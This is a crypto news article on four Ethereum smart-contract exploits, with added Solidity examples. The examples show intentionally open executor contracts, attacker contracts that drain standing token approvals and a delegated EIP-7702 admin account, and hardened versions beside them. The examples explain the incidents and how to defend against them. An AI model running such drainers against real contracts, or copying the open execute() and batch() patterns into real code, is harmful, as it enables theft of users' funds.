Ethereum has seen a concentrated wave of smart-contract attacks, with security monitors tracking more than $1.5 million in losses across four incidents in roughly 48 hours. The figures come from a CertiK Alert update and separate monitoring from GoPlus Security, which grouped the incidents into four failure modes: stale token approvals, third-party vault exposure, reentrancy, and arbitrary call execution.
The largest tracked loss came from an Onchain aggregator-related contract, where an attacker drained about $983,000 through an execute() function that lacked an access-control check. The victim address had a pre-existing unlimited yvWETH approval for that contract, so the attacker could make the contract pull 384.67 yvWETH on the attacker's behalf and later unwind the position into roughly 429 ETH.
The same cluster included a TradingProtocol-linked third-party vault incident with about $398,000 in losses, a BCB contract attack tied to reentrancy that cost about $39,800, and a QNT reserve-pool drain worth about $124,900. Together, the cases show how quickly small design gaps can turn into liquid losses when approvals, vault permissions, and external calls are exposed.
The yvWETH attack stands out because it did not need a fresh approval from the victim during the exploit transaction. The risk already existed because the victim had granted unlimited approval to the vulnerable contract. Once the contract allowed unauthorized execution, the attacker could convert an old permission into an immediate drain path.
That pattern keeps showing up across DeFi because approvals are treated as ordinary user friction rather than as a live balance-sheet risk. A wallet may approve a router, vault, aggregator, or experimental contract once, then leave that allowance active for months. If the approved contract later exposes a function that forwards arbitrary calls, loses an access-control check, or routes execution incorrectly, the old approval becomes the attacker's settlement layer: the contract is the approved spender, so whoever can drive its calls can spend every allowance it holds.
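The approval-plus-open-executor pattern described above, as an added Solidity illustration. It is not the code of any contract named in the article; OpenExecutor, Drainer and GuardedExecutor are hypothetical names, and the vulnerable contract is written deliberately open to show why a standing allowance to it is enough for a drain.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration only: hypothetical contracts, not the code of any
// contract named in the article.
interface IERC20 {
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// VULNERABLE: a router-style contract that users have approved as a spender.
// execute() forwards any calldata to any target with no caller check, so the
// contract's identity, and every allowance granted to it, is usable by anyone.
contract OpenExecutor {
    function execute(address target, bytes calldata data) external returns (bytes memory) {
        (bool ok, bytes memory ret) = target.call(data);
        require(ok, "call failed");
        return ret;
    }
}

// What the attacker submits: a call that makes OpenExecutor spend a victim's
// standing allowance. The victim signs nothing during this transaction.
contract Drainer {
    function drain(OpenExecutor exec, IERC20 token, address victim, uint256 amount) external {
        exec.execute(
            address(token),
            abi.encodeCall(IERC20.transferFrom, (victim, msg.sender, amount))
        );
    }
}

// HARDENED: the contract never lends its identity to arbitrary calldata. It
// pulls only the caller's own tokens, and forwards only to an owner-managed
// allow-list that must exclude token contracts and other generic call forwarders.
contract GuardedExecutor {
    address public immutable owner;
    mapping(address => bool) public allowedTarget;

    constructor() { owner = msg.sender; }

    function setTarget(address target, bool allowed) external {
        require(msg.sender == owner, "not owner");
        allowedTarget[target] = allowed;
    }

    function execute(IERC20 token, uint256 amount, address target, bytes calldata data)
        external
        returns (bytes memory)
    {
        require(allowedTarget[target], "target not allowed");
        // Funds move only from msg.sender; a stale approval from any other
        // address cannot be spent through this path.
        require(token.transferFrom(msg.sender, address(this), amount), "pull failed");
        (bool ok, bytes memory ret) = target.call(data);
        require(ok, "call failed");
        return ret;
    }
}
```

The attacker never needs the victim online: Drainer.drain() runs in one transaction against an allowance granted long before. On the user side the matching fix is to call approve(spender, 0) on the token for any spender no longer in use. In production the transferFrom return check should go through a SafeERC20-style wrapper, because some tokens return nothing instead of a bool.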
The TradingProtocol-related vault incident appears to fit the same broader risk category: custody logic and third-party contract dependencies can expose funds even when the core protocol is not directly exploited. Until a full technical postmortem is published, the safer framing is that the loss involved a connected vault contract rather than a confirmed compromise of every related TradingProtocol component.
The QNT case adds a newer, Ethereum-specific concern. SlowMist tracked a flawed EIP-7702 account setup that allowed 1,988.5 QNT, worth about 54.93 ETH, to be drained from a reserve pool. The issue centered on an administrator externally owned account that delegated its code to a BatchExecutor contract through EIP-7702. That BatchExecutor in turn relied on a BatchCall contract with no permission control, leaving its batch() function open for anyone to route arbitrary external calls under the administrator's address.
EIP-7702 lets an externally owned account point its code at a contract through signed authorization tuples. Once the delegation is set, any transaction sent to that account executes the delegated code, and calls that code makes go out under the EOA's own address. The feature improves account flexibility, but weak delegation design creates dangerous call paths if developers treat upgraded EOAs like ordinary wallets without modeling the new execution surface: every caller of the delegated code, not only the key holder, must be treated as a potential operator of the account.
The QNT exploit does not mean EIP-7702 itself is broken. It shows that permissionless batch execution, delegated account logic, and admin-controlled reserve pools need stricter review before they handle real liquidity.
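The delegation failure above, as an added Solidity sketch. This is not SlowMist's analysis or the deployed contracts; OpenBatchExecutor, GuardedBatchExecutor, ReservePool and Attacker7702 are hypothetical names, and the attack path assumes the reserve pool's admin is the EOA that delegated to the open executor.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration only: hypothetical contracts, not the ones analysed by SlowMist.
interface IERC20 {
    function transfer(address to, uint256 amount) external returns (bool);
}

struct Call {
    address to;
    uint256 value;
    bytes data;
}

// VULNERABLE: deployed once, then an EOA points its code here with an EIP-7702
// authorization. Every transaction sent *to* that EOA now runs this code, with
// msg.sender = whoever sent the transaction. Without a caller check, a stranger
// can issue calls that the rest of the chain sees as coming from the EOA.
contract OpenBatchExecutor {
    function batch(Call[] calldata calls) external payable {
        for (uint256 i = 0; i < calls.length; i++) {
            (bool ok, ) = calls[i].to.call{value: calls[i].value}(calls[i].data);
            require(ok, "call failed");
        }
    }
}

// A reserve pool that trusts a single admin address. If admin is the delegated
// EOA above, the require passes for anyone who drives batch() on that EOA.
contract ReservePool {
    address public immutable admin;
    constructor(address admin_) { admin = admin_; }

    function withdraw(IERC20 token, address to, uint256 amount) external {
        require(msg.sender == admin, "not admin");
        require(token.transfer(to, amount), "transfer failed");
    }
}

// The attacker's transaction: call batch() at the admin EOA's address with a
// single withdraw() aimed at the pool. The pool sees msg.sender == admin.
contract Attacker7702 {
    function drain(address adminEoa, ReservePool pool, IERC20 token, uint256 amount) external {
        Call[] memory calls = new Call[](1);
        calls[0] = Call({
            to: address(pool),
            value: 0,
            data: abi.encodeCall(ReservePool.withdraw, (token, msg.sender, amount))
        });
        OpenBatchExecutor(adminEoa).batch(calls);
    }
}

// HARDENED: the delegated code only accepts calls from the account itself,
// i.e. a transaction signed by the EOA's key, for which msg.sender == address(this).
// Relayed or sponsored batches need a separate path that verifies the EOA's
// signature over the calls and a nonce instead of trusting msg.sender.
contract GuardedBatchExecutor {
    function batch(Call[] calldata calls) external payable {
        require(msg.sender == address(this), "only the delegating account");
        for (uint256 i = 0; i < calls.length; i++) {
            (bool ok, ) = calls[i].to.call{value: calls[i].value}(calls[i].data);
            require(ok, "call failed");
        }
    }
}
```

The msg.sender == address(this) check is the minimum for a self-executing 7702 account: inside the delegated code, address(this) is the EOA, so only a transaction the EOA signed satisfies it, and a contract that was called from within a batch cannot re-enter batch() because its msg.sender would be that contract. Anything that relaxes this check, including a separately deployed helper the executor forwards to, reopens the admin's identity to the public.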
The BCB incident shows that older vulnerability classes still matter. Reentrancy attacks exploit contracts that make external calls before safely updating internal state. If a contract allows repeated entry into sensitive logic before balances, shares, or withdrawal records are finalized, attackers can loop the same action and drain more value than intended.
The loss in the BCB case was smaller than the yvWETH and vault incidents, but the mechanism is still important. Reentrancy has been one of DeFi’s best-known attack classes for years, which makes each new example a reminder that audit coverage, state-transition ordering, and emergency controls remain essential even for smaller contracts.
The four-incident cluster shows a market where exploit windows are shrinking. Attackers can scan contracts, test permissions, route funds, and convert assets rapidly once a weakness becomes visible. AI-assisted tooling may add even more pressure by reducing the time between vulnerability discovery and exploit execution.
For users, the direct defense is approval hygiene: revoke unused allowances by setting them to zero, cap approvals at the amount actually needed instead of granting unlimited ones, and keep high-value storage wallets separate from experimental DeFi activity. For builders, the lesson is stricter permission design around execute(), batch(), vault withdrawal logic, and any function that can forward arbitrary external calls, because such a function inherits every allowance and privilege its contract or account holds.
Ethereum liquidity remains deep, but deep liquidity also makes successful exploits easier to monetize. That is why this wave matters beyond the $1.5 million headline: the same mechanics can scale quickly when exposed permissions meet larger balances.
The post Ethereum Smart Contract Attacks Top $1.5M In Two-Day Security Wave appeared first on Crypto Adventure.